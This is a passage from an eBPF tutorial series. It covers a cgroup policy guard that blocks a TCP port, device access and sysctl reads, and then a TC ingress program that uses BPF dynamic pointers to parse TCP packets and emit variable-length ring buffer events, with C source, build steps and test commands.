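}
```

Calling it on /dev/null should report 1 and 3 on Linux, the pair used in the tutorial's examples.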

The cg_sysctl function intercepts sysctl reads/writes under /proc/sys/. It uses bpf_sysctl_get_name() to get the sysctl name, in path format like kernel/hostname (slash-separated, not dots). We only block reads, allowing writes—this is safer for testing and won't accidentally change system configuration.
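Since most people know sysctls by their dotted names, a loader may want to accept kernel.hostname and convert it before writing the configuration. The helper below is a naive sketch with a hypothetical name, `demo_sysctl_dots_to_slashes`. It replaces every dot, so it would mangle names whose components themselves contain dots (some network interface names do).

```c
#include <stddef.h>

/* Convert "kernel.hostname" to "kernel/hostname".
 * Returns 0 on success, -1 if out is too small. */
static int demo_sysctl_dots_to_slashes(const char *dotted, char *out, size_t len)
{
    size_t i;

    if (len == 0)
        return -1;

    for (i = 0; dotted[i] != '\0'; i++) {
        if (i + 1 >= len) /* keep room for the terminating NUL */
            return -1;
        out[i] = (dotted[i] == '.') ? '/' : dotted[i];
    }
    out[i] = '\0';
    return 0;
}
```

The result has the same form as the names produced by bpf_sysctl_get_name() in the program above.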

The configuration options at the top of the program are declared as const volatile. This is the standard libbpf pattern for read-only global variables: the values are defaults (0 or an empty string) at compile time, and userspace sets the actual values via skel->rodata-> after open() and before load(). This allows a single compiled BPF object to run with different configurations.

Userspace Loader: cgroup_guard.c

// SPDX-License-Identifier: GPL-2.0 OR BSD-3-Clause
/* cgroup_guard.c - Userspace loader for cgroup eBPF policy guard */
#include <errno.h>
#include <fcntl.h>
#include <getopt.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/resource.h>
#include <sys/stat.h>
#include <unistd.h>
#include <arpa/inet.h>

#include <bpf/libbpf.h>

#include "cgroup_guard.skel.h"
#include "cgroup_guard.h"

static volatile sig_atomic_t exiting = 0;

static void sig_handler(int sig)
{
    (void)sig;
    exiting = 1;
}

static int libbpf_print_fn(enum libbpf_print_level level,
                           const char *format, va_list args)
{
    if (level == LIBBPF_DEBUG)
        return 0;
    return vfprintf(stderr, format, args);
}

static void usage(const char *prog)
{
    fprintf(stderr,
        "Usage: %s [OPTIONS]\n"
        "\n"
        "Options:\n"
        "  -c, --cgroup PATH           cgroup v2 path (default: /sys/fs/cgroup/ebpf_demo)\n"
        "  -p, --block-port PORT       block TCP connect() to this dst port (IPv4)\n"
        "  -d, --deny-device MAJ:MIN   deny device access for (major:minor)\n"
        "  -s, --deny-sysctl NAME      deny sysctl READ of this name\n"
        "  -h, --help                  show this help\n",
        prog);
}

static int handle_event(void *ctx, void *data, size_t data_sz)
{
    (void)ctx;
    (void)data_sz;

    const struct event *e = (const struct event *)data;

    if (e->type == EVENT_CONNECT4) {
        char ip[INET_ADDRSTRLEN] = {0};
        struct in_addr addr = { .s_addr = e->connect4.daddr };
        inet_ntop(AF_INET, &addr, ip, sizeof(ip));

        printf("[DENY connect4] pid=%u comm=%s daddr=%s dport=%u proto=%u\n",
               e->pid, e->comm, ip, e->connect4.dport, e->connect4.proto);
    } else if (e->type == EVENT_DEVICE) {
        printf("[DENY device]   pid=%u comm=%s major=%u minor=%u access_type=0x%x\n",
               e->pid, e->comm, e->device.major, e->device.minor, e->device.access_type);
    } else if (e->type == EVENT_SYSCTL) {
        printf("[DENY sysctl]   pid=%u comm=%s write=%u name=%s\n",
               e->pid, e->comm, e->sysctl.write, e->sysctl.name);
    }

    fflush(stdout);
    return 0;
}

int main(int argc, char **argv)
{
    const char *cgroup_path = "/sys/fs/cgroup/ebpf_demo";
    int block_port = 0;
    int dev_major = 0, dev_minor = 0;
    const char *deny_sysctl = NULL;

    /* Parse command line arguments */
    static const struct option long_opts[] = {
        { "cgroup",      required_argument, NULL, 'c' },
        { "block-port",  required_argument, NULL, 'p' },
        { "deny-device", required_argument, NULL, 'd' },
        { "deny-sysctl", required_argument, NULL, 's' },
        { "help",        no_argument,       NULL, 'h' },
        {}
    };

    int opt;
    while ((opt = getopt_long(argc, argv, "c:p:d:s:h", long_opts, NULL)) != -1) {
        switch (opt) {
        case 'c': cgroup_path = optarg; break;
        case 'p': block_port = atoi(optarg); break;
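        case 'd':
            /* Parse MAJ:MIN, e.g. "1:3" for /dev/null */
            if (sscanf(optarg, "%d:%d", &dev_major, &dev_minor) != 2) {
                fprintf(stderr, "invalid --deny-device value: %s\n", optarg);
                return 1;
            }
            break;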
        case 's': deny_sysctl = optarg; break;
        default: usage(argv[0]); return 1;
        }
    }

    libbpf_set_print(libbpf_print_fn);
    signal(SIGINT, sig_handler);
    signal(SIGTERM, sig_handler);

    /* Create cgroup directory if needed */
    mkdir(cgroup_path, 0755);

    int cg_fd = open(cgroup_path, O_RDONLY | O_DIRECTORY);
    if (cg_fd < 0) {
        fprintf(stderr, "open(%s) failed: %s\n", cgroup_path, strerror(errno));
        return 1;
    }

    /* Open and configure BPF skeleton */
    struct cgroup_guard_bpf *skel = cgroup_guard_bpf__open();
    if (!skel) {
        fprintf(stderr, "cgroup_guard_bpf__open() failed\n");
        close(cg_fd);
        return 1;
    }

    /* Write .rodata configuration (must be before load) */
    if (block_port > 0 && block_port <= 65535)
        skel->rodata->blocked_tcp_dport = (__u16)block_port;
    if (dev_major > 0 || dev_minor > 0) {
        skel->rodata->blocked_dev_major = (__u32)dev_major;
        skel->rodata->blocked_dev_minor = (__u32)dev_minor;
    }
    if (deny_sysctl) {
        snprintf((char *)skel->rodata->denied_sysctl_name,
                 SYSCTL_NAME_LEN, "%s", deny_sysctl);
    }

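    /* Declared before the first goto so cleanup never sees uninitialized pointers */
    struct bpf_link *link_connect = NULL, *link_dev = NULL, *link_sysctl = NULL;
    struct ring_buffer *rb = NULL;

    /* Load BPF programs into kernel */
    int err = cgroup_guard_bpf__load(skel);
    if (err) {
        fprintf(stderr, "cgroup_guard_bpf__load() failed: %d\n", err);
        goto cleanup;
    }

    /* Attach programs to cgroup (libbpf returns NULL and sets errno on failure) */
    link_connect = bpf_program__attach_cgroup(skel->progs.cg_connect4, cg_fd);
    link_dev = bpf_program__attach_cgroup(skel->progs.cg_dev, cg_fd);
    link_sysctl = bpf_program__attach_cgroup(skel->progs.cg_sysctl, cg_fd);
    if (!link_connect || !link_dev || !link_sysctl) {
        err = -errno;
        fprintf(stderr, "attach to cgroup failed: %s\n", strerror(errno));
        goto cleanup;
    }

    /* Setup ring buffer for events */
    rb = ring_buffer__new(bpf_map__fd(skel->maps.events),
                          handle_event, NULL, NULL);
    if (!rb) {
        err = -errno;
        fprintf(stderr, "ring_buffer__new() failed: %s\n", strerror(errno));
        goto cleanup;
    }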

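    printf("Attached to cgroup: %s\n", cgroup_path);
    printf("Config: block_port=%d, deny_device=%d:%d, deny_sysctl_read=%s\n",
           block_port, dev_major, dev_minor, deny_sysctl ? deny_sysctl : "(none)");
    printf("Press Ctrl-C to stop.\n");

    /* Main event loop */
    while (!exiting) {
        err = ring_buffer__poll(rb, 200 /* ms */);
        if (err == -EINTR)
            err = 0; /* interrupted by a signal: not an error */
        if (err < 0) {
            fprintf(stderr, "ring_buffer__poll() failed: %d\n", err);
            break;
        }
        err = 0; /* a positive return is the number of events consumed */
    }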

    ring_buffer__free(rb);

cleanup:
    bpf_link__destroy(link_sysctl);
    bpf_link__destroy(link_dev);
    bpf_link__destroy(link_connect);
    cgroup_guard_bpf__destroy(skel);
    close(cg_fd);
    return err ? 1 : 0;
}

Understanding the Userspace Code

The userspace loader's core job is to attach BPF programs to the specified cgroup, then continuously poll the ringbuf to print denied events.

The program first uses getopt_long to parse command-line arguments, getting the cgroup path and three policy configurations. Then it uses open() with O_RDONLY | O_DIRECTORY to open the cgroup directory and get a file descriptor. This fd is the attach target—cgroup eBPF programs are attached to cgroup directories.
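As a minimal sketch of the directory-open step described above, the helper below opens a path with O_RDONLY | O_DIRECTORY and returns either a descriptor or a negative errno value. The name open_cgroup_dir and the added O_CLOEXEC flag are assumptions made for illustration; they are not taken from the tutorial source.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Hypothetical helper (not from the tutorial source): open a cgroup v2
 * directory and return an fd usable as an attach target, or -errno. */
static int open_cgroup_dir(const char *path)
{
    /* O_DIRECTORY makes open() fail with ENOTDIR if path is not a directory */
    int fd = open(path, O_RDONLY | O_DIRECTORY | O_CLOEXEC);

    if (fd < 0) {
        int saved = errno;  /* fprintf() may overwrite errno */
        fprintf(stderr, "open(%s) failed: %s\n", path, strerror(saved));
        return -saved;
    }
    return fd;
}
```

The returned descriptor plays the role of cg_fd in the loader: it is what gets passed to bpf_program__attach_cgroup(), and it should be closed once the links are destroyed.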

Next comes the standard skeleton workflow: cgroup_guard_bpf__open() opens the BPF object, the loader writes the .rodata configuration, and cgroup_guard_bpf__load() loads everything into the kernel. The configuration must be written before load, because the .rodata map is frozen at load time and can no longer be modified afterwards.

Attaching uses bpf_program__attach_cgroup(prog, cg_fd) to attach each BPF program to the cgroup. Here we attach three programs: connect4, dev, and sysctl. After successful attachment, all processes in this cgroup will have their relevant operations go through these BPF programs.

Finally, the event loop. ring_buffer__poll() polls the ringbuf, calling the handle_event callback whenever events arrive to print them. This lets you see which operations are being denied in real-time.

Building

cd src/cgroup
make

Running

Terminal A: Start the loader

# Block: TCP port 9090, /dev/null (1:3), reading kernel/hostname
sudo ./cgroup_guard \
  --cgroup /sys/fs/cgroup/ebpf_demo \
  --block-port 9090 \
  --deny-device 1:3 \
  --deny-sysctl kernel/hostname

You should see:

Attached to cgroup: /sys/fs/cgroup/ebpf_demo
Config: block_port=9090, deny_device=1:3, deny_sysctl_read=kernel/hostname
Press Ctrl-C to stop.

Terminal B: Start test servers (outside cgroup)

# Start two HTTP servers
python3 -m http.server 8080 --bind 127.0.0.1 &
python3 -m http.server 9090 --bind 127.0.0.1 &

Terminal C: Test from within the cgroup

sudo bash -c '
echo $$ > /sys/fs/cgroup/ebpf_demo/cgroup.procs

echo "== TCP test =="
curl -s http://127.0.0.1:8080 >/dev/null && echo "8080 OK"
curl -s http://127.0.0.1:9090 >/dev/null && echo "9090 OK (unexpected)" || echo "9090 BLOCKED (expected)"

echo
echo "== Device test =="
cat /dev/null && echo "/dev/null OK (unexpected)" || echo "/dev/null BLOCKED (expected)"

echo
echo "== Sysctl test =="
cat /proc/sys/kernel/hostname && echo "sysctl read OK (unexpected)" || echo "sysctl read BLOCKED (expected)"
'

Expected output:

8080 OK - Port 8080 is allowed
9090 BLOCKED (expected) - Port 9090 is blocked
/dev/null BLOCKED (expected) - Device 1:3 is blocked
sysctl read BLOCKED (expected) - Reading kernel/hostname is blocked

Terminal A output (events)

[DENY connect4] pid=12345 comm=curl daddr=127.0.0.1 dport=9090 proto=6
[DENY device]   pid=12346 comm=cat major=1 minor=3 access_type=0x...
[DENY sysctl]   pid=12347 comm=cat write=0 name=kernel/hostname

One-click Test

We provide a test script that automatically compiles, starts servers, runs tests, and cleans up:

sudo ./test.sh

Verifying with bpftool

sudo bpftool cgroup tree /sys/fs/cgroup/ebpf_demo

When to Use cgroup eBPF

Choosing the right technology depends on your control granularity requirements.

cgroup eBPF's control granularity is process groups—put processes in a cgroup, attach a BPF program, and the policy applies to that group. This is perfect for container scenarios: each container is a cgroup, and you can set different network policies, device permissions, and sysctl access rules for different containers. When a process leaves the cgroup, the policy automatically stops applying—no manual cleanup needed.

XDP and tc's control granularity is network interfaces. They handle all traffic passing through a specific NIC, regardless of which process it comes from. If you need high-performance packet processing, DDoS protection, or load balancing, XDP/tc are better choices. But if you want "only allow container A to access port 80, while container B can access any port," XDP/tc become inconvenient.

seccomp-BPF's control granularity is individual processes. It filters system calls, such as preventing a process from calling fork, exec, or socket. seccomp is lower-level and suitable for process sandboxing. However, it cannot express higher-level semantics such as network destination addresses or device major:minor numbers.

Traditional iptables/nftables are global. Rules you configure apply to all processes on the entire system—there's no way to say "this rule only affects container A."

In summary: if you need per-container/process-group policies, want to control network, devices, and sysctls together, and want policies to automatically follow process lifecycles, cgroup eBPF is the right choice.

Summary

By binding policies to process groups, cgroup eBPF provides fine-grained control that traditional global policies cannot achieve. This tutorial demonstrated three commonly used cgroup hooks:

cgroup/connect4: Filter destination ports at TCP connection time, blocking disallowed outbound connections
cgroup/dev: Check major:minor at device access time, restricting reads/writes to specific devices
cgroup/sysctl: Check names at sysctl read/write time, preventing sensitive configuration leaks or tampering

This "policy guard" pattern can be extended to production use cases: container network policies (similar to Kubernetes NetworkPolicy), device isolation (GPU/TPU exclusive access), security sandboxes (restricting system information access). With ringbuf event reporting, you can also implement policy auditing and alerting.

If you want to learn more about eBPF, check out our tutorial repository at https://github.com/eunomia-bpf/bpf-developer-tutorial or visit our website at https://eunomia.dev/tutorials/.

References

Kernel docs: libbpf program types - all cgroup-related section names
eBPF docs: CGROUP_SOCK_ADDR - socket address hooks explained
eBPF docs: CGROUP_DEVICE - device access control explained
eBPF docs: CGROUP_SYSCTL - sysctl access control explained
Tutorial repository: https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/cgroup

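Full source code is available in the tutorial repository. cgroup-attached BPF programs date back to Linux 4.10, but this example needs Linux 5.8 or newer because it relies on the BPF ring buffer (5.8) and the cgroup/sysctl hook (5.2). It also requires cgroup v2 and libbpf.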

eBPF Tutorial by Example: BPF Dynamic Pointers for Variable-Length Data

云微 — Tue, 17 Feb 2026 07:43:38 +0000

Ever written an eBPF packet parser and struggled with those verbose data_end bounds checks that the verifier still rejects? Or tried to send variable-length events through ring buffers only to find yourself locked into fixed-size structures? Traditional eBPF development forces you to prove memory safety statically at compile time, which becomes painful when dealing with runtime-determined sizes like packet lengths or user-configurable snapshot lengths.

This is what BPF dynptrs (dynamic pointers) solve. Introduced gradually from Linux v5.19, dynptrs provide a verifier-friendly way to work with variable-length data by shifting some bounds checking from compile-time static analysis to runtime validation. In this tutorial, we'll build a TC ingress program that uses skb dynptrs to parse TCP packets safely and ringbuf dynptrs to output variable-length events containing configurable payload snapshots.

The complete source code: https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/dynptr

Introduction to BPF Dynamic Pointers

The Problem: When Static Verification Isn't Enough

The eBPF verifier's core mission is proving memory safety at load time. Every pointer dereference must be bounded, every array access must be within limits. This works beautifully for simple cases, but becomes a struggle when sizes are determined at runtime.

Consider parsing a packet where the IP header length comes from a 4-bit field, or reading user-configurable amounts of TCP payload. The classic approach requires extensive bounds checking with data_end comparisons, and even correctly written code sometimes fails verification because the verifier cannot trace all possible paths. When working with non-linear skb data (paged buffers), the situation gets worse since that data isn't directly accessible through ctx->data at all.

Variable-length output presents similar challenges. The traditional bpf_ringbuf_reserve() returns a raw pointer, but writing runtime-determined amounts of data to it makes the verifier uncomfortable because it cannot statically prove your writes stay within bounds.

The Solution: Runtime-Checked Dynamic Pointers

Dynptrs introduce an opaque handle type that carries metadata about the underlying memory region including its bounds and type. You cannot dereference a dynptr directly since the verifier will reject such attempts. Instead, you must use helper functions or kfuncs that perform the appropriate safety checks.

The key insight is that some of these checks happen at runtime rather than compile time. Functions like bpf_dynptr_read() and bpf_dynptr_write() validate bounds when they execute and return errors on failure. Functions like bpf_dynptr_slice() return NULL when the requested region cannot be accessed safely. This lets you express logic that would be unprovable statically while maintaining safety guarantees.

For the verifier, dynptrs are tracked specially. They have lifecycle rules (some must be released), type constraints (skb dynptrs behave differently than local dynptrs), and the verifier ensures you follow these rules. The runtime checks are the verifier's way of delegating what it cannot prove statically.

Dynptr API Overview

Helpers vs Kfuncs

The dynptr ecosystem spans two categories of functions. Helper functions are part of the stable UAPI and generally maintain backward compatibility. Kfuncs (kernel functions) are internal kernel exports to BPF with no ABI stability guarantees, meaning they may change between kernel versions.

For dynptrs, the foundational read/write operations are helpers, while newer features like skb dynptrs and slicing are kfuncs. This means some dynptr functionality requires newer kernels and you should verify availability before relying on specific features.

Creating Dynptrs

There are several ways to create dynptrs depending on your data source. The bpf_dynptr_from_mem() helper creates a dynptr from map values or global variables, useful for working with configuration data or scratch buffers. The bpf_dynptr_from_skb() kfunc creates a dynptr from a socket buffer, enabling safe access to packet data including non-linear (paged) regions. For XDP programs, bpf_dynptr_from_xdp() provides similar functionality.

Ring buffer operations use bpf_ringbuf_reserve_dynptr() to allocate variable-length records. Unlike regular bpf_ringbuf_reserve(), whose size argument must be a constant the verifier knows at load time, the dynptr variant accepts a size computed at runtime. This is crucial for variable-length event structures.

Reading and Writing

The bpf_dynptr_read() helper copies data from a dynptr into a destination buffer. It takes an offset and length, performing runtime bounds checking and returning an error if the read would exceed the dynptr's bounds. This is the safe way to extract data when you need it in a local buffer.

The bpf_dynptr_write() helper does the reverse, copying data into a dynptr. For skb dynptrs, writing may have additional semantics similar to bpf_skb_store_bytes(), and note that writes can invalidate previously obtained slices.

The bpf_dynptr_data() helper returns a direct pointer to data within the dynptr, with the verifier tracking the bounds statically. However, this does NOT work for skb or xdp dynptrs since their data may not be in a single contiguous region.

Slicing for Packet Parsing

For skb and xdp dynptrs, bpf_dynptr_slice() is the primary way to access data. You provide an offset, a length, and optionally a local buffer. The function returns a pointer to the requested data, which may be either a direct pointer into the packet or your provided buffer (if the data needed to be copied from non-linear regions).

The critical rule is that you must NULL-check the return value. A NULL return means the requested region cannot be accessed, either because it exceeds packet bounds or for other internal reasons. Once you have a valid slice pointer, you can dereference it safely within the requested bounds.
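The slice contract described above can be illustrated with a small userspace model. This is a sketch under stated assumptions, not the kernel implementation: struct model_pkt and model_slice() are hypothetical names, and the packet is modeled as one directly addressable head plus one non-linear fragment.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical userspace model of a packet: a linear head that can be
 * addressed directly, followed by one "paged" fragment. */
struct model_pkt {
    const uint8_t *head; size_t head_len;
    const uint8_t *frag; size_t frag_len;
};

/* Model of the slice contract: return a direct pointer when the range is
 * linear, copy into buf when it is not, and return NULL when the range is
 * out of bounds or a copy is needed but no buffer was supplied. */
static const void *model_slice(const struct model_pkt *p, size_t off,
                               void *buf, size_t len)
{
    size_t total = p->head_len + p->frag_len;

    if (off > total || len > total - off)
        return NULL;                    /* exceeds packet bounds */
    if (off + len <= p->head_len)
        return p->head + off;           /* fully linear: no copy */
    if (!buf)
        return NULL;                    /* copy required, no buffer given */

    /* Range touches the fragment: gather the bytes into the caller's buffer */
    size_t from_head = off < p->head_len ? p->head_len - off : 0;
    if (from_head)
        memcpy(buf, p->head + off, from_head);
    memcpy((uint8_t *)buf + from_head,
           p->frag + (off + from_head - p->head_len), len - from_head);
    return buf;
}
```

In this model, as in the description above, the caller cannot know in advance whether the result points into the packet or into its own buffer, which is why the only safe pattern is to NULL-check the return value and then read through the returned pointer.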

There's also bpf_dynptr_slice_rdwr() for obtaining writable slices, with availability depending on the program type and whether the underlying data supports writes.

Ring Buffer Lifecycle

The bpf_ringbuf_reserve_dynptr() function has special lifecycle rules enforced by the verifier. Once you call it, you must call either bpf_ringbuf_submit_dynptr() or bpf_ringbuf_discard_dynptr() on the dynptr, regardless of whether the reservation succeeded. This is not optional since the verifier tracks dynptr state and will reject programs that leak reserved dynptrs.

This differs from regular ringbuf usage where a NULL return from bpf_ringbuf_reserve() means nothing was allocated. With dynptrs, the reserve failure still requires explicit cleanup through discard. The verifier needs this guarantee to ensure proper resource management.

Implementation: TC Ingress with Dynptr Parsing and Variable-Length Events

Our demonstration program attaches to TC ingress and accomplishes three things. First, it creates an skb dynptr from incoming packets using bpf_dynptr_from_skb(). Second, it parses Ethernet, IPv4, and TCP headers using bpf_dynptr_slice() for safe bounds-checked access. Third, it outputs variable-length events through a ringbuf dynptr, including a configurable snapshot of TCP payload.

Complete BPF Program: dynptr_tc.bpf.c

// SPDX-License-Identifier: GPL-2.0
#include <vmlinux.h>
#include <bpf/bpf_helpers.h>
#include <bpf/bpf_endian.h>

#include "dynptr_tc.h"

/* kfunc declarations for dynptr operations (v6.4+) */
extern int bpf_dynptr_from_skb(struct __sk_buff *s, __u64 flags,
                               struct bpf_dynptr *ptr__uninit) __ksym;
extern void *bpf_dynptr_slice(const struct bpf_dynptr *ptr, __u32 offset,
                              void *buffer__opt, __u32 buffer__sz) __ksym;

struct {
    __uint(type, BPF_MAP_TYPE_RINGBUF);
    __uint(max_entries, 1 << 24); /* 16MB */
} events SEC(".maps");

struct {
    __uint(type, BPF_MAP_TYPE_ARRAY);
    __uint(max_entries, 1);
    __type(key, __u32);
    __type(value, struct dynptr_cfg);
} cfg_map SEC(".maps");

SEC("tc")
int dynptr_tc_ingress(struct __sk_buff *ctx)
{
    const struct dynptr_cfg *cfg;
    struct bpf_dynptr skb_ptr;

    /* Temporary buffers for slice (data may be copied here) */
    struct ethhdr eth_buf;
    struct iphdr  ip_buf;
    struct tcphdr tcp_buf;

    const struct ethhdr *eth;
    const struct iphdr  *iph;
    const struct tcphdr *tcp;

    cfg = bpf_map_lookup_elem(&cfg_map, &(__u32){0});
    if (!cfg)
        return TC_ACT_OK;

    /* Create dynptr from skb */
    if (bpf_dynptr_from_skb(ctx, 0, &skb_ptr))
        return TC_ACT_OK;

    /* Parse Ethernet header using slice */
    eth = bpf_dynptr_slice(&skb_ptr, 0, &eth_buf, sizeof(eth_buf));
    if (!eth)
        return TC_ACT_OK;

    if (eth->h_proto != bpf_htons(ETH_P_IP))
        return TC_ACT_OK;

    /* Parse IPv4 header */
    __u32 ip_off = sizeof(*eth);
    iph = bpf_dynptr_slice(&skb_ptr, ip_off, &ip_buf, sizeof(ip_buf));
    /* ihl counts 32-bit words; anything below 5 is not a valid IPv4 header */
    if (!iph || iph->version != 4 || iph->ihl < 5 || iph->protocol != IPPROTO_TCP)
        return TC_ACT_OK;

    /* Parse TCP header */
    __u32 tcp_off = ip_off + ((__u32)iph->ihl * 4);
    tcp = bpf_dynptr_slice(&skb_ptr, tcp_off, &tcp_buf, sizeof(tcp_buf));
    if (!tcp)
        return TC_ACT_OK;

    __u16 dport = bpf_ntohs(tcp->dest);
    __u16 sport = bpf_ntohs(tcp->source);
    __u8 drop = (cfg->blocked_port && (sport == cfg->blocked_port || dport == cfg->blocked_port));

    /* Output variable-length event using ringbuf dynptr */
    if (cfg->enable_ringbuf) {
        __u32 snap_len = cfg->snap_len;
        __u8 payload[MAX_SNAPLEN] = {};

        __u32 payload_off = tcp_off + ((__u32)tcp->doff * 4);
        if (payload_off < ctx->len) {
            __u32 avail = ctx->len - payload_off;
            if (snap_len > avail) snap_len = avail;
            if (snap_len > MAX_SNAPLEN) snap_len = MAX_SNAPLEN;

            if (bpf_dynptr_read(payload, snap_len, &skb_ptr, payload_off, 0))
                snap_len = 0;
        } else {
            snap_len = 0;
        }

        struct event_hdr hdr = {
            .ts_ns = bpf_ktime_get_ns(),
            .ifindex = ctx->ifindex,
            .pkt_len = ctx->len,
            .saddr = iph->saddr,
            .daddr = iph->daddr,
            .sport = sport,
            .dport = dport,
            .drop = drop,
            .snap_len = snap_len,
        };

        /* Reserve variable-length ringbuf record */
        struct bpf_dynptr rb;
        __u32 total_sz = sizeof(hdr) + snap_len;

        long err = bpf_ringbuf_reserve_dynptr(&events, total_sz, 0, &rb);
        if (err) {
            /* Must discard even on failure */
            bpf_ringbuf_discard_dynptr(&rb, 0);
            return drop ? TC_ACT_SHOT : TC_ACT_OK;
        }

        bpf_dynptr_write(&rb, 0, &hdr, sizeof(hdr), 0);
        if (snap_len)
            bpf_dynptr_write(&rb, sizeof(hdr), payload, snap_len, 0);

        bpf_ringbuf_submit_dynptr(&rb, 0);
    }

    return drop ? TC_ACT_SHOT : TC_ACT_OK;
}

char _license[] SEC("license") = "GPL";

Understanding the BPF Code

The program begins by declaring the kfuncs it needs. The bpf_dynptr_from_skb() function creates a dynptr from the socket buffer, and bpf_dynptr_slice() returns pointers to specific regions within it. The __ksym attribute tells the loader these are kernel symbols to be resolved at load time.

When parsing headers, notice how we provide local buffers (eth_buf, ip_buf, tcp_buf) to each slice call. The slice function may return a pointer directly into packet data if it's linearly accessible, or it may copy data into our buffer and return a pointer to the buffer. Either way, we get a valid pointer we can dereference, or NULL on failure.

The NULL check pattern is crucial. Each slice call can fail if the requested offset plus length exceeds packet bounds or if the data cannot be accessed for other reasons. Checking for NULL before using the returned pointer is mandatory.

For ringbuf output, we use bpf_dynptr_read() to copy TCP payload from the skb into a local buffer first. This demonstrates reading from an skb dynptr with runtime-determined length (bounded by configuration and available data). The read may fail if bounds are exceeded, in which case we set snap_len to zero.
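The snapshot-length arithmetic can be checked in isolation with plain C. The sketch below mirrors the clamping logic of the BPF program. The value of MAX_SNAPLEN (defined in dynptr_tc.h, which is not shown here) is an assumption, the 14-byte Ethernet header assumes no VLAN tag, and both function names are hypothetical.

```c
#include <stdint.h>

#define MAX_SNAPLEN 256u    /* assumed value; the real one is in dynptr_tc.h */
#define ETH_HDR_LEN 14u     /* untagged Ethernet header */

/* Offset of the TCP payload, given the IPv4 ihl and TCP doff fields,
 * both of which count 32-bit words. */
static uint32_t tcp_payload_off(uint32_t ihl, uint32_t doff)
{
    return ETH_HDR_LEN + ihl * 4 + doff * 4;
}

/* Clamp the requested snapshot length to the bytes actually available in
 * the packet and to the size of the scratch buffer. */
static uint32_t clamp_snap_len(uint32_t want, uint32_t pkt_len,
                               uint32_t payload_off)
{
    if (payload_off >= pkt_len)
        return 0;                       /* no payload at all */

    uint32_t avail = pkt_len - payload_off;
    if (want > avail)
        want = avail;
    if (want > MAX_SNAPLEN)
        want = MAX_SNAPLEN;
    return want;
}
```

For instance, a 74-byte SYN-ACK with ihl=5 and doff=10 has its payload offset at 14 + 20 + 40 = 74, so nothing is available and the snapshot length is 0. A 221-byte packet with ihl=5 and doff=8 has 155 payload bytes available, so a requested length of 32 is kept as is.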

The ringbuf dynptr reserve shows the variable-length allocation pattern. We compute the total size (header plus snapshot) and reserve that exact amount. After writing both the header and payload using bpf_dynptr_write(), we submit the record. Note the discard call on reserve failure to satisfy the verifier's lifecycle requirements.

Complete User-Space Program: dynptr_tc.c

// SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause)
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <net/if.h>
#include <bpf/libbpf.h>
#include <bpf/bpf.h>

#include "dynptr_tc.skel.h"
#include "dynptr_tc.h"

static volatile sig_atomic_t exiting = 0;

static void sig_handler(int signo) { exiting = 1; }

static int handle_event(void *ctx, void *data, size_t data_sz)
{
    const struct event_hdr *e = data;
    char saddr[INET_ADDRSTRLEN], daddr[INET_ADDRSTRLEN];

    inet_ntop(AF_INET, &e->saddr, saddr, sizeof(saddr));
    inet_ntop(AF_INET, &e->daddr, daddr, sizeof(daddr));

    printf("if=%u %s:%u -> %s:%u len=%u drop=%u snap=%u",
           e->ifindex, saddr, e->sport, daddr, e->dport,
           e->pkt_len, e->drop, e->snap_len);

    if (e->snap_len && data_sz >= sizeof(*e) + e->snap_len) {
        printf(" payload=\"");
        for (int i = 0; i < e->snap_len; i++) {
            unsigned char c = e->payload[i];
            putchar((c >= 32 && c <= 126) ? c : '.');
        }
        printf("\"");
    }
    printf("\n");
    return 0;
}

int main(int argc, char **argv)
{
    const char *ifname = NULL;
    struct dynptr_cfg cfg = { .blocked_port = 0, .snap_len = 64, .enable_ringbuf = 1 };

    /* Parse arguments */
    for (int i = 1; i < argc; i++) {
        if (!strcmp(argv[i], "-i") && i+1 < argc) ifname = argv[++i];
        else if (!strcmp(argv[i], "-p") && i+1 < argc) cfg.blocked_port = atoi(argv[++i]);
        else if (!strcmp(argv[i], "-s") && i+1 < argc) cfg.snap_len = atoi(argv[++i]);
        else if (!strcmp(argv[i], "-n")) cfg.enable_ringbuf = 0;
    }

    if (!ifname) {
        fprintf(stderr, "Usage: %s -i <ifname> [-p port] [-s len] [-n]\n", argv[0]);
        return 1;
    }

    int ifindex = if_nametoindex(ifname);
    if (!ifindex) { perror("if_nametoindex"); return 1; }

    signal(SIGINT, sig_handler);
    signal(SIGTERM, sig_handler);

    struct dynptr_tc_bpf *skel = dynptr_tc_bpf__open_and_load();
    if (!skel) { fprintf(stderr, "Failed to load BPF\n"); return 1; }

    /* Configure */
    bpf_map_update_elem(bpf_map__fd(skel->maps.cfg_map), &(__u32){0}, &cfg, BPF_ANY);

    /* Attach to TC ingress */
    struct bpf_tc_hook hook = { .sz = sizeof(hook), .ifindex = ifindex, .attach_point = BPF_TC_INGRESS };
    struct bpf_tc_opts opts = { .sz = sizeof(opts), .handle = 1, .priority = 1,
                                .prog_fd = bpf_program__fd(skel->progs.dynptr_tc_ingress) };

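    int ret = 1;                    /* stays non-zero until the event loop exits cleanly */
    struct ring_buffer *rb = NULL;

    bpf_tc_hook_create(&hook);      /* -EEXIST only means the clsact qdisc already exists */
    if (bpf_tc_attach(&hook, &opts)) { fprintf(stderr, "TC attach failed\n"); goto cleanup; }

    if (cfg.enable_ringbuf) {
        rb = ring_buffer__new(bpf_map__fd(skel->maps.events), handle_event, NULL, NULL);
        if (!rb) { fprintf(stderr, "Failed to create ring buffer\n"); goto detach; }
    }

    printf("Attached to TC ingress of %s (ifindex=%d). Ctrl-C to exit.\n", ifname, ifindex);
    printf("blocked_port=%u snap_len=%u ringbuf=%u\n",
           cfg.blocked_port, cfg.snap_len, (unsigned)cfg.enable_ringbuf);

    while (!exiting) {
        if (rb) ring_buffer__poll(rb, 100);
        else usleep(100000);
    }
    ret = 0;

    ring_buffer__free(rb);
detach:
    /* bpf_tc_detach() rejects opts that still carry these fields */
    opts.flags = opts.prog_fd = opts.prog_id = 0;
    bpf_tc_detach(&hook, &opts);
    bpf_tc_hook_destroy(&hook);
cleanup:
    dynptr_tc_bpf__destroy(skel);
    return ret;
}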

Understanding the User-Space Code

